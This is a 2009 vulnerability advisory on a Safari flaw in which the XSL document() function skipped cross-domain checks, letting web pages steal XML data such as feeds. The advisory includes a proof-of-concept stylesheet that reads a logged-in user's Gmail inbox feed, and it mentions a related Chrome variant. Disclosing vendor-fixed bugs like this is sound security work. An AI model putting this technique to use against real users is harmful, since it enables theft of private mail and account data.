CESA-2009-008 - rev 1
[See all my vulnerabilities at
http://scary.beasts.org/security]
[Blog if you want to subscribe to new findings is at
http://scarybeastsecurity.blogspot.com/]
Apple Safari cross-domain XML theft
Programs affected: Safari prior to version 4. In addition, the "302
redirect trick" variant affected a pre-production version of Chrome.
Severity: Websites can steal any XML formatted data cross-domain
Vendor URL (copy): APPLE-SA-2009-06-08-1
CVE: CVE-2009-1713, CVE-2009-1700
Initial report: Jun 2008
This bug represents a failure to check for cross-domain access in a relatively
obscure feature that permits cross-domain access. It is one of the bugs I
demoed but did not disclose at
PacSec and
HiTB Dubai.
The particular feature involved in this case is the XSL document()
function, which can load XML from a URL. Failure to check for cross-domain
access here leads to XML theft from arbitrary web sites. XML theft is
unpleasant because very sensitive information can be rendered in feeds,
XML-formatted AJAX-y responses and XHTML versions of web apps.
Here's sample code for an evil XSL which abuses this function to steal
inbox details from a logged-in Gmail session:
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:str="http://exslt.org/strings" extension-element-prefixes="str">
<xsl:template match="*">
<html>
<body>
Below, you should see e-mail stolen cross-domain!
<p/>
<xsl:value-of select="document('https://mail.google.com/mail/feed/atom')"/>
<script>
alert(document.body.innerHTML)
</script>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
A variant of this attack, involving using the
302 redirect trick
to fool the original fix's idea of the XML's domain also affected a
pre-production version of Chrome (long since fixed and fixed prior to v1.0).
Demo
Click
here whilst logged into Gmail using Safari 3
Credits
- Google - found on Google's time. Be aware that nothing on my personal
pages or blog represents Google... obviously.
CESA-2009-008 - rev 1
Chris Evans
scarybeasts@gmail.com